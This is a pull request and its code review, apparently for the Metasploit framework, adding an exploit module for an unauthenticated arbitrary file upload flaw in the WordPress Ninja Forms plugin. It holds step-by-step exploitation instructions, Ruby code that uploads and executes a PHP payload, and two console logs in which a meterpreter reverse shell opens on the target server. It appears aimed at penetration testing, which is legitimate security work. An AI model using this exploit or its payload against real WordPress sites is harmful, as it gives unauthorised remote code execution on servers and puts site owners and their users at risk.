### PR TITLE
Add WordPress Ninja Forms unauthenticated file upload module

### PR DESCRIPTION
**Pull request by rastating**
The Ninja Forms plugin for WordPress from version 2.9.36 to 2.9.42 introduces an unauthenticated file upload vulnerability through code that is executed when previewing the next major release (version 3). Through lack of user level validation, any user, including guests, is able to update the settings of the plugin and enable the version 3 preview mode, thus enabling the vulnerable code allowing for any arbitrary file to be uploaded and executed in the context of the web server.

This module will take the following steps to exploit this vulnerability:
1. Enable the version 3 preview mode
2. Acquire a nonce from the specified page containing a form created by Ninja Forms
3. Upload and execute the payload
4. Disable the preview mode
## Impact

The [official website](https://ninjaforms.com/) reports there have been over 2.5 million downloads of the plugin, and the [WordPress plugin repository](https://wordpress.org/plugins/ninja-forms/) reports there to be currently over 500,000 active installs.
## References
- https://wpvulndb.com/vulnerabilities/8485
- http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities
## Verification
- [x] Download and install [WordPress](https://wordpress.org/download/)
- [x] Install a version of the Ninja Forms plugin in the range of v2.9.36 to 2.9.42 from https://wordpress.org/plugins/ninja-forms/developers/
- [x] Activate the plugin in the WordPress admin panel and create a new form
- [x] After creating a new form, create a new page in the WordPress admin panel and append the form to the page by using the Ninja Form widget (see screenshot below).
- [x] Start `msfconsole`
- [x] `use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload`
- [x] Set the `FORM_PATH` option to be the relative path to the previously created page
- [x] Set all other standard options and `run`
## Screenshot of Ninja Form Widget in Page Editor

ninja_forms
## Example Output

```
msf > use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > set RHOST wordpress.vm
RHOST => wordpress.vm
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > set FORM_PATH /test-page/
FORM_PATH => /test-page/
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > set LHOST 192.168.1.157
LHOST => 192.168.1.157
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > set VERBOSE true
VERBOSE => true
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > check

[*] Checking /wp-content/plugins/ninja-forms/readme.txt
[*] Found version 2.9.36 of the plugin
[*] The target appears to be vulnerable.
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > run

[*] Started reverse TCP handler on 192.168.1.157:4444
[*] Enabling vulnerable V3 functionality...
[+] Enabled V3 functionality
[*] Preparing payload...
[*] Uploading payload to /wp-content/uploads/nftmp-gopfkdmzss.php
[*] Executing the payload...
[*] Sending stage (33721 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.157:4444 -> 192.168.1.15:55015) at 2016-05-24 00:59:01 +0100
[+] Deleted nftmp-gopfkdmzss.php
[+] Executed payload
[*] Disabling vulnerable V3 functionality...
[+] Disabled V3 functionality

meterpreter > getuid
Server username: www-data (33)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.15 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(wp_ninja_forms_unauthenticated_file_upload) >
```

### CODE REVIEW

**Comment by wvu-r7** [comment]
Paging Drs. @FireFart and @espreto. Is this a candidate for https://github.com/espreto/wpsploit?

**Comment by void-in** [comment]
@wvu-r7 I think with over 2.5 mil downloads and 500k active installs, this needs to be in the msf repo. We tend to move those plugins in the wpsploit which don't have such a huge install base.

**Comment by wvu-r7** [comment]
Hah, I didn't even check. Thanks, @void-in. :)

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,146 @@
...
+    end
+
+    vprint_good 'Enabled V3 functionality'
+  end
+
+  def disable_v3_functionality
+    print_status 'Disabling vulnerable V3 functionality...'
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => '/',
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: I'm not sure this makes sense? Is this a wordpress feature? What if I install wordpress in a different directory? Will this request still work?

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb [hunk 2]
```diff
@@ -0,0 +1,146 @@
...
+
+  def check
+    check_plugin_version_from_readme('ninja-forms', '2.9.43', '2.9.36')
+  end
+
+  def enable_v3_functionality
+    print_status 'Enabling vulnerable V3 functionality...'
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => '/',
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: Same question as well. What if I change the WP directory?

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb [hunk 3]
```diff
@@ -0,0 +1,146 @@
...
+  def generate_mime_message(payload_name, nonce)
+    data = Rex::MIME::Message.new
+    data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
+    data.add_part(nonce, nil, nil, 'form-data; name="security"')
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
+    data
+  end
+
+  def fetch_ninja_form_nonce
+    uri = normalize_uri(target_uri.path, datastore['FORM_PATH'])
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: If you don't register the TARGETURI option, ```target_uri.path``` is always ```/```, is this what you actually want?

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb [hunk 4]
```diff
@@ -0,0 +1,146 @@
...
+    vprint_error("Server responded with status code #{res.code}") if res.code != 200
+  end
+
+  def execute_payload(payload_name, payload_url)
+    register_files_for_cleanup("nftmp-#{payload_name.downcase}")
+    res = send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
+
+    if !res.nil? && res.code == 404
+      print_error("Failed to upload the payload")
+    else
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: What if res is nil?

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb (hunk 1 above)
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: it should be `target_uri` (defined in the wordpress mixin)

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb (hunk 2 above)
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: it should be `target_uri` (defined in the wordpress mixin)

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb (hunk 3 above)
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: @wchen-r7 `target_uri` is defined in the wordpress mixin

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb (hunk 4 above)
Comment (rastating) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: @wchen-r7 - Sometimes res will be nil even though it's executed successfully, e.g. when getting a shell and the script continues to run on the server

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb (hunk 3 above)
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: Ah I forgot, thanks!

File: modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb (hunk 4 above)
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ninja_forms_unauthenticated_file_upload.rb]: Ah yes you're right, you get a session but your HTTP request hangs. Ok. Thanks for the clarification.

**Comment by wchen-r7** [comment]
Exploit works for me:

```
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > check

[*] Checking /wordpress/wp-content/plugins/ninja-forms/readme.txt
[*] Found version 2.9.42 of the plugin
[*] The target appears to be vulnerable.
msf exploit(wp_ninja_forms_unauthenticated_file_upload) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Enabling vulnerable V3 functionality...
[+] Enabled V3 functionality
[*] Preparing payload...
[*] Uploading payload to /wordpress/wp-content/uploads/nftmp-qotxyylubj.php
[*] Executing the payload...
[*] Sending stage (33721 bytes) to 192.168.146.136
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.136:35459) at 2016-05-25 15:34:21 -0500
[+] Deleted nftmp-qotxyylubj.php
[+] Executed payload
[*] Disabling vulnerable V3 functionality...
[+] Disabled V3 functionality

meterpreter >
```

**Pull request merged**